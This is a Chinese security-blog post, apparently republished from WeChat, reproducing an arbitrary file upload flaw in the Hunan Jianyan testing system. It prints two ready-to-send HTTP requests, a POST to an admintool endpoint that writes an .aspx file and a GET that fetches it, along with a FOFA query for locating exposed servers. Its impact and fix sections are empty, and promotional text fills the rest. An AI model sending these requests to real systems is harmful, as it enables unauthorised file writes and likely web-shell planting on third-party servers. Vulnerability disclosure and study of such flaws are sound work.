最近很多小伙伴反馈看不到最新的推文,由于微信公众号推送机制改变了,解决办法:
给公众号设为星标
棉花糖博客地址
漏洞详情
01
影响版本
02
湖南建研-检测系统 漏洞复现
03
上传文件数据包
POST /Scripts/admintool?type=updatefile HTTP/1.1Host: ip:hostUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36Content-Length: 41Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Connection: closeContent-Type: application/x-www-form-urlencodedAccept-Encoding: gzip, deflate, brfilePath=log.aspx&fileContent=mht
访问上传路径
GET /Scripts/log.aspx HTTP/1.1Host: ip:portUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Connection: closeCookie: ASP.NET_SessionId=bsa1jkvxeyr14b5pvleerqr5Accept-Encoding: gzip, deflate, br
fofa语法
04
body="/Content/Theme/Standard/webSite/login.css"修复建议
05
打个广告
人太懒
放在这里一大篇也让大家心烦
有兴趣自己点开看吧👇
END
那么又到了文末我们应该?
1、关注!点赞!转发!
3、封面获取请后台回复:20231227封面
文章来源: http://mp.weixin.qq.com/s?__biz=Mzg5NTYwMDIyOA==&mid=2247500732&idx=1&sn=b9f23935b09bebd505162dab4a82cdd3&chksm=c19c969250c28fa0c0e68a8d10de8ccf15066c548329799a8cf9438b05f0324d2d4450af2034&scene=0&xtrack=1#rd
如有侵权请联系:admin#unsafe.sh
如有侵权请联系:admin#unsafe.sh